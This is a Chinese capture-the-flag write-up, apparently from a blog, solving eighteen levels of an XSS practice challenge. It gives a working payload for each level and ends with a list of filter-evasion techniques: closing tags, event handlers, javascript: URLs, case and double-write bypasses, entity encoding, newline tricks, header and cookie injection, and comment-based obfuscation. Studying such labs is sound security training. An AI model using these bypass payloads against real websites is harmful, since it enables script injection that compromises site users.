第一关:
http://test.ctf8.com/level1.php?name=test
观察到通过get方式传参有会显,
直接打最简单的xss
playload:

<script>alert(1);</script>


第二关:

http://test.ctf8.com/level2.php?keyword=test
通过观察发现有个输入框,也是get方式传参,也有回显,先做一下测试

<script>alert(1);</script>


审查一下元素:
发现我们的js代码被input标签所包含,尝试闭合标签
playload:

"><script>alert(1);</script>

第三关:
还是get传参,我们先试验一下

"><script>alert(1);</script>

审查元素后,我们发现打的xss还是在input标签呢,

通过之前的闭合标签没有用,看一下网页源码
发现 " > < 被做了转义 所以尝试利用js事件绕过 也需要闭合标签,看了网页源码发现是单引号
(我常用的两个 onclick和oninput 当然还有,比如οnmοuseοver)

playload:

' onclick='alert(1)       //点击

或者

' oninput='alert(1)       //输入

第4关:
第四关还是像之前一样先用最简单的xss打一下,发现 <>被过滤了,

用第三题的playload试一下发现,没有闭合掉标签,playload直接显示了出来,

查看源码发现原来这里需要用双引号闭合
于是playload:

" onclick="alert(1)

或者

“ oninput=”alert(1)

第5关:
还是常规的思路 先拿最简单的试一下
发现 有过滤,直接把script改了 那我们再试一下 js事件

果然也是被过滤了,哈哈哈哈哈哈再咋说人家也是第5关嘞 试一下大小写看能不能行

不区分啊,那就换个思路,试一下新建个标签然后js伪协议
playload:

"><a href=javascript:alert(1);>1</a>

第6关:
打最简单的xss试一下:

还是过滤了,想必on也是做了过滤

没错,再用js伪协议试一下

他对href也做了过滤,我又试了一下大小写,本来我以为没有希望的时候(因为上个题就试了一下大小写不行),但没想到可以耶,早知道就打最简单的xss时就直接大写了
playload:(前面的playload都可以,只要大写绕过就好,记得要闭合标签哦)

"><a HREF=javascript:alert(1);>1</a>

第7题:
用最简单的xss打了一下,发现过滤了script
用js事件,发现也是过滤了
这里我想到了双写绕过,一般这种过滤整个关键字的,双写是个很好的思路
playload:

"><scscriptript>alert(1);</sscriptcript>

第8关:
一打开发现个添加外部链接的功能
这个肯定要试一下js伪协议啦
先看一下源码
这里不需要新建标签,源码中value的值直接传到了中,直接写

javascript:alert(1);

但没有用,看了源码发现 script被过滤,试一下大小写

没用,那就是一下html实体编码 t的html实体编码是t r是r
playload:

javascript:alert(1);

第9关:
还是有个添加链接的功能 试一下刚才的playload:
提示链接不合法


查看报错发现,应该要是http://才行
修改一下palyload

javascript:alert(1);//http://www.123.com

第10题
啥框都没了,就url 然后也有回显。打个最简单的xss

先看一下网页源码把
源码中漏出来破绽,发现有3个输入,并且<>也被过滤了,我想到了用js事件绕过,但这里并没有提供可以输入的文本框,所以我们可以写一个,所以playload的思路就是,输出源码中的三个值,并且利用写一个可输入的文本框,可以让我们利用js事件。
playload:

t_link=&t_history=&t_sort="onclick="alert()"type="text


第11题
感觉跟上一道题很像,直接看一下源码

有4个输入的值,也没有扫描框框,先打个最简单的xss看一下
发现<>做了过滤,上次的playload也没有用,很奇怪。说起来很巧,题目一开始我就查看了源码,感觉应该是题目一开始就给了提醒,我翻回去又看了一下,发现t_ref字段处存在注入漏洞
而且返回值是referer
推测可能是referer注入 思路大概就是抓包,然后在referer请求头中进行注入xss
playload:

" onclick=javascript:alert(1)  type="text"

第12题
还是类似的,看了源码发现 新的输入
看到了属性值,发现应该是useragent注入
playload:

" onclick=javascript:alert(1)  type="text"

第13题:
还是类似的哦,这次是要利用cookie进行注入

playload:

" onclick=javascript:alert(1)  type="text"

第14题:
第14题就不一样啦,看了源码发现用iframe引用了一个页面

执行一个图片的exif信息中可以包含xss代码,这个不太懂,所以我就百度了
具体做法,上传图片,修改图片中的exif信息,打入我们的xss代码,然后利用浏览器查看就可以了。
第15题:我打不开。。。。。。溜了
第16题:
尝试一下打最简单的xss

过滤了script / 还有 空格,看了源码发现,输出位置的标签不能用,但空格会被过滤,所以可以考虑自己写个标签 用%0A %0B回车换行符绕过
playload:

<img%0Asrc=x%0Aonclick=alert(1)>

第17关:
偷个懒,直接看源码 发现存在embed标签
,embed标签本身就可以加入js事件,所以我们直接利用
playload:

 onmouseover=alert(1) //前面有个空格,如果空格过滤的话跟上题一样用回车换行符绕过

第18关:
还是跟17题一样
存在embed标签
playload:

%0Aonclick=alert(1)

最后两题
flash xss 不太会

总结:

多看源码,从源码中找方法利用xss,同时也要注意标签的闭合
常用的绕过姿势:

  1. 新建html标签绕过
  2. 绕过一些过滤,比如双写,大小写,回车换行符,对标签属性值进行转码(比如html实体编码,改进制啥的)
  3. 利用js事件
  4. 利用css跨站解析
  5. 如果是style形式的 还可以插入\或者注释符/**/
  6. 插入混淆属性:
    我们进行一般的文字录入时会发现,并不是所有带"JavaSceipt"这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插 入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如:
 < img src="abc>" οnmοuseοver="[code]">

//插入混淆的src属 性

<IMG """><SCRIPT>[code]</SCRIPT>">

//插入混 淆的双引号及 “>”符号

 <SCRIPT a=">" SRC="xss.js"></SCRIPT>

//插入混淆的a 属性
7.用注释符分割
由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响XSS代码的正常运行。比如:

<img style="xss:expr/*XSS*/ession([code])">

/css的注释符号 为/**/,其中的内容会被忽略

<style>@im\port'\ja\vasc\ript:alert("XSS")';</style>

//css中忽略的符号还有“\”

exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression (alert("XSS"))'>

//注释混淆后的样子

<style><!--</style><script>[code]//-- ></script>

//html的注释符为

XSS挑战之旅,学习笔记的更多相关文章

  1. XSS挑战之旅---游戏通关攻略

    最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬Mramydnei,喜欢XSS的大家可以一起来学习交流. 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一 ...

  2. XSS挑战之旅(通过看代码解题)

    XSS 挑战之旅 level 1 没有什么过滤 payload: <script>alert(1)</script> level 2 php关键代码: echo "& ...

  3. xss挑战之旅wp

    Level 1  -  180831 第一关很简单,开胃菜 payload: http://localhost/xss_game/level1.php?name=test123<script&g ...

  4. XSS挑战之旅平台通关练习

    1.第一关 比较简单,测试语句: <svg/onload=alert(1)> <script>confirm(1)</script> <script>p ...

  5. 1.6 xss挑战平台练习

    ------------------------- XSS挑战之旅 ------------------------- 最近在学习xss,找到了一个xss练习平台,在线地址:http://test.x ...

  6. 我的Android进阶之旅------>Android中编解码学习笔记

    编解码学习笔记(一):基本概念 媒体业务是网络的主要业务之间.尤其移动互联网业务的兴起,在运营商和应用开发商中,媒体业务份量极重,其中媒体的编解码服务涉及需求分析.应用开发.释放license收费等等 ...

  7. 【Microsoft Azure学习之旅】消息服务Service Bus的学习笔记及Demo示例

    今年项目组做的是Cloud产品,有幸接触到了云计算的知识,也了解并使用了当今流行的云计算平台Amazon AWS与Microsoft Azure.我们的产品最初只部署在AWS平台上,现在产品决定同时支 ...

  8. Web安全学习笔记 XSS上

    Web安全学习笔记 XSS上 繁枝插云欣 --ICML8 XSS的分类和基本认识 XSS的危害 同源策略的基本认识 一.XSS的分类和基本认识 1. 简介 XSS全称为Cross Site Scrip ...

  9. 我的Android之旅——学习、项目、心态

    本文作者: 伯乐在线 - 唐韧 .未经许可,禁止转载!欢迎分享原创到伯乐头条. 来源:唐韧 学习Android也一年多了,项目做了五六个,有大有小,有难有易.一直以来都没有好好总结过,今天周六休息,就 ...

随机推荐

  1. P2094运输

    -------------------- 链接:Miku ------------------- 这是一道水贪心,很容易想到做法就是把最贵的两个放在一块,让后当成一个重新放回队列 ---------- ...

  2. springBoot 中 logback配置文件详解

    logback介绍和配置详解 logback是Java的开源框架,性能比log4j要好.是springboot自带的日志框架.该框架主要有3个模块: logback-core:核心代码块(不介绍) l ...

  3. oracle数据库应用开发经验

    l  日志表应该以时间做分区,方便清理 一般应用都会有一些表用来记录用户操作日志,数据变更记录,交易流水等日志型的库表.这些表最好按时间字段做分区,这样在迁移或者清理历史记录时会比较方便,借助orac ...

  4. maven的核心概念——仓库

    第十章仓库 10.1 分类 [1]本地仓库:为当前本机电脑上的所有Maven工程服务. [2]远程仓库 (1)私服:架设在当前局域网环境下,为当前局域网范围内的所有Maven工程服务. (2)中央仓库 ...

  5. discuz!ml-3.x版本getshell

    影响范围: discuz! ml v3.x全版本. 产生原因 漏洞原因:Discuz!ML 系统对cookie中的l接收的language参数内容未过滤,导致字符串拼接,从而执行php代码. 利用ex ...

  6. Lucene索引维护(添加、修改、删除)

    1. Field域属性分类 添加文档的时候,我们文档当中包含多个域,那么域的类型是我们自定义的,上个案例使用的TextField域,那么这个域他会自动分词,然后存储            我们要根据数 ...

  7. IDEA 同时打开两个项目,相互引用

  8. 03-React基础语法(3)

    一.Context 概念:Context 提供一个无需在每层组件中添加Props,就可以实现组件组件之间通信的方法   语法: 1创建context对象 const {Provider, Consum ...

  9. Minion 主机同步失败问题,全过程

    如果出现以下状态 token也有了 这个是salt-api  说明你salt-api没问题 点击同步主机 查看你产品线管理那里,添加了你这个salt-api没? 配置参考文档 https://gith ...

  10. 剑指offer-基础练习-增删节点-链表

    /* 链表基本操作: 插入节点和删除节点 */ /* 思路: 使用指向链表的头指针,这样在新插入节点后,头指针不会改变 */ struct ListNode{ int value; ListNode* ...